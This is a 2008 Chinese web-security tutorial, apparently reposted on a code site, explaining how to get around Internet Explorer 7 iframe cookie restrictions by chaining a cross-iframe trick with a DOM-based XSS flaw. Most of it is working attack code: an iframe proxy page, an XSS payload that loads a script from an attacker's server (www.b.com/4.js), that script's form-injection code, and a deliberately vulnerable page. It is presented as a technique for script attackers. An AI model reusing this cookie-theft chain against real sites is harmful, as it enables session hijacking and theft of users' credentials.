当前位置: 代码网 > 服务器>网络安全>企业安全 > 教你如何突破IE安全限制获取iframe子框架内的本地cookie(图)

教你如何突破IE安全限制获取iframe子框架内的本地cookie(图)

2008年10月08日 企业安全 我要评论
教你如何突破IE安全限制获取iframe子框架内的本地cookie(图) 我的测试环境是: IE 7 (7.0.5730.13)以下所有的内容全部经过我在IE7中测试,是真实有效的结果。Iframe的限制:因为iframe这个玩意比较特殊,所以浏览器对它一般都有一... 08-10-08
我的测试环境是: ie 7 (7.0.5730.13)

以下所有的内容全部经过我在ie7中测试,是真实有效的结果。

iframe的限制:
因为iframe这个玩意比较特殊,所以浏览器对它一般都有一些限制。

首先父窗口不能控制子窗口的js,只能读取一些对象;子窗口也不能使用父窗口的js,也只能读部分对象,更多的比如document啥的都限制了。

关系如下:

- iframe's should not be able to view content/cookies from another domain
- iframe children can view certain properties and execute certain behaviors
- parent.window.blur
- parent.window.opener
- parent.window.length
- others
- iframe children can redirect the parent frame to a new location (great for phishing)
- parent.location.href
- parent.window.location
对于有些利用子窗口执行父窗口js的方法是限制的
比如,在子窗口里可以这么使用:
parent.location.href="http://www.sohu.com";

上面的语句将把父窗口重新定义到sohu的网站去.

但是如果想执行js,或者是读取document对象,则会被拒绝访问
parent.location.href=new string("javascript:alert(document.cookie)");
parent.location.href=new string("javascript:alert(1)");

像这两条都会被拒绝。

对于iframe,firefox3 居然是不限制本地cookie发送的!也就是说,在firefox环境里,使用iframe包含一个远程页面,是会将保存在本地的cookie发送出去的,这使得csrf会非常之方便。

但是ie不同,对于ie环境中,img和iframe标签都只能发送session cookie,无法发送本地cookie,所以很多时候csrf会失败,这也会给xss带来很大的麻烦,比如会使得xsrf更困难一些。

鉴于firefox一点挑战都没有,所以今天主要研究的对象是ie。

在ie环境下,程序员们一般都是使用p3p协议来获取跨域cookie的,但是p3p也要求我们改写http头,更麻烦,在这里,我纯粹使用一些脚本的技巧来突破这些限制。

突破iframe限制的思路:(以下都是在ie环境中)
由于页面里的iframe都是发送的session cookie,所以子框架页面里本身是只有一个session cookie的,我们无法通过在子框架里执行js的方法来获取本地cookie,无中生有的事情是干不出来的。

了解这一原理后,思路就很明确了:想办法新起一个不受限制的窗口,从而获取本地cookie。

具体来说,有这么两个办法:
1、 使用window.open打开一个新窗口
2、 回到父窗口,让其打开一个新窗口

在子框架中,使用window.open()确实可以发送本地cookie,但是问题是浏览器一般会限制页面弹窗口,会被拦截,所以这个方法比较囧~~,不是个好办法。

而第二个办法,回到父窗口去打开新窗口,就涉及到一个突破iframe执行脚本的问题,而这个问题在我的前一篇cross iframe trick 里已经解决了,所以我们的方法就呼之欲出了。

利用cross iframe trick突破iframe限制获取子框架cookie:

cross iframe的最大贡献就在于他可以绕过前面提到的iframe的限制,在父域或者子框架里获取对象,执行脚本。

当一个页面很难突破时,如果他包含了一个存在弱点的iframe页面,则可能会带来灾难性的结果。

我相信真正精通脚本攻击的人是能够看到它的用处和优势的。

环境如下:(绑定127.0.0.1 www.baidu.com)
http://www.a.com/1.html 是我们要攻击的页面,它包含了一个存在弱点的iframe,用户只会去浏览这个页面

http://www.baidu.com/3.html 是我们已经控制的页面,他作为一个iframe被1.html所包含。在这里是iframe proxy

http://www.a.com/4.html 是www.a.com上的一个存在xss漏洞的页面,一般情况下用户不会去访问它!

http://www.b.com/4.js 这是攻击者自己的服务器上的一个恶意脚本,将被xss攻击远程载入4.html中。

由于用户只会浏览www.a.com/1.html,所以我们要通过脚本攻击,从www.a.com/1.html里获取用户在www.baidu.com/3.html的本地cookie。

www.a.com/1.html的代码如下:
---------------------------------- 我是聪明的分割线 -------------------------------------------
<script>
// 函数tt1 ,在最后将被4.html注入参数
function tt1(fvck){
alert("tt1() and args= " fvck);
document.write("<input id=\"bbb\" value=\'test1" fvck "\' >");
}
</script>

<body>
<iframe id="tt2_3" src="http://www.baidu.com/3.html" width="300" height="300" ></iframe>
</body>
---------------------------------- 我是聪明的分割线 -------------------------------------------

它包含了一个iframe页面

www.baidu.com/3.html 的代码为:
---------------------------------- 我是聪明的分割线 -------------------------------------------
<html>
<body>

<script>
//parent.location.href=new string("javascript:alert(document.cookie)");
//parent.location.href="http://www.sohu.com";

alert("3.html in iframe and cookie=" document.cookie);

// iframe proxy: 创建一个动态iframe,并利用4.html里的xss漏洞
var tt1_4 = document.createelement("iframe");
tt1_4.src = "http://www.a.com/4.html#' ><script src=\"http://www.b.com/4.js\"><\/script><\'";
document.body.appendchild(tt1_4);
</script>

</body>
</html>
---------------------------------- 我是聪明的分割线 -------------------------------------------

3.html是我们的iframe proxy,利用它来完成在www.a.com里执行脚本的工作。

www.a.com/4.html 的代码为:
---------------------------------- 我是聪明的分割线 -------------------------------------------
<html>

<script>
// 一个基于dom的xss漏洞
document.write("<input id=\"aaa\" value=\'test4" window.location.href "\' >");
//window.open("http://www.baidu.com/4.html"); 会带上cookie
</script>

<body>
this is 4.html!
<!-- 把这里的注释去掉可以用来测试,这样发送的还是session cookie!
<form id="form1" method="post" action="http://www.baidu.com/2.html" >
<img src="/article/uploadfiles/200809/20080902083122466.jpg" onload=submitpost4();>
</form>
<script>function submitpost4(){ document.forms[0].submit(); }</script>
-->
</body>
</html>
---------------------------------- 我是聪明的分割线 -------------------------------------------

www.b.com/4.js 的代码为:
---------------------------------- 我是聪明的分割线 -------------------------------------------
alert("4.js is loaded!");

top.tt1('\'><form id=\"form1\" method=\"post\" action=\"http://www.baidu.com/2.html\" ><img src=\"/article/uploadfiles/200809/20080902083122466.jpg\" onload=submitpost4();></form><script>function submitpost4(){ document.forms[0].submit(); }</script><\!-- \'');

---------------------------------- 我是聪明的分割线 -------------------------------------------

4.js才是我们真正利用xss漏洞和cross iframe trick来新起一个窗口,从而获取本地cookie的方法。

www.baidu.com/2.html的代码很简单,他的作用是查看当前的cookie:
---------------------------------- 我是聪明的分割线 -------------------------------------------
<script>
alert("2.html cookie=" document.cookie);
</script>

---------------------------------- 我是聪明的分割线 -------------------------------------------

在这里攻击流程是这样的:
www.a.com/1.html ----iframe----> www.baidu.com/3.html ----动态iframe---> www.a.com/4.html 的xss漏洞 ------> 在www.a.com域中远程加载www.b.com/4.js


(0)

相关文章:

  • 教你如何应对DDoS险滩

    教你如何应对DDoS险滩

    教你如何应对DDoS险滩 随着网络带宽的增加和多种DDoS黑客工具的发布,各种DDoS攻击软件都可以很轻松地从互联网上获得。于是,DDoS拒绝服务攻击的实施越... [阅读全文]
  • 木马保护生成

    木马保护生成

    木马保护生成 这几天研究了一下木马保护生成,现在给各位菜鸟分享一下。很多人做木马生成器但是不想让别人改或研究生成后的木马这就需要对生成出的木马进行保护。保护的... [阅读全文]
  • 教初学者如何把执行文件内存中的DLL的代码全部保存下来

    教初学者如何把执行文件内存中的DLL的代码全部保存下来

    教初学者如何把执行文件内存中的DLL的代码全部保存下来 有时,有些软件有保护,看不到他程序内部是怎么一个样,如果想简单的把他的内存保存下来!我写了一个简单的函... [阅读全文]
  • 公开个Nday(图)

    公开个Nday(图)

    公开个Nday(图) 08046估计国内很多小牛大牛搞出来了.最早知道有这么个洞大约是在今年三四月份,听某牛man说有个系统默认支持的图片格式的洞,结果四月份... [阅读全文]
  • 菜鸟必懂的木马连接原理

    菜鸟必懂的木马连接原理

    菜鸟必懂的木马连接原理 目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马  正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端... [阅读全文]
  • 教你让网马原代码隐藏的方法

    教你让网马原代码隐藏的方法

    教你让网马原代码隐藏的方法 网马再怎么加密,都有可能被反加密的可能,为了更好保护自己的代码,看看这办法,但这办法对付不了抓包分析,数据包抓取也是没办法的目的:... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com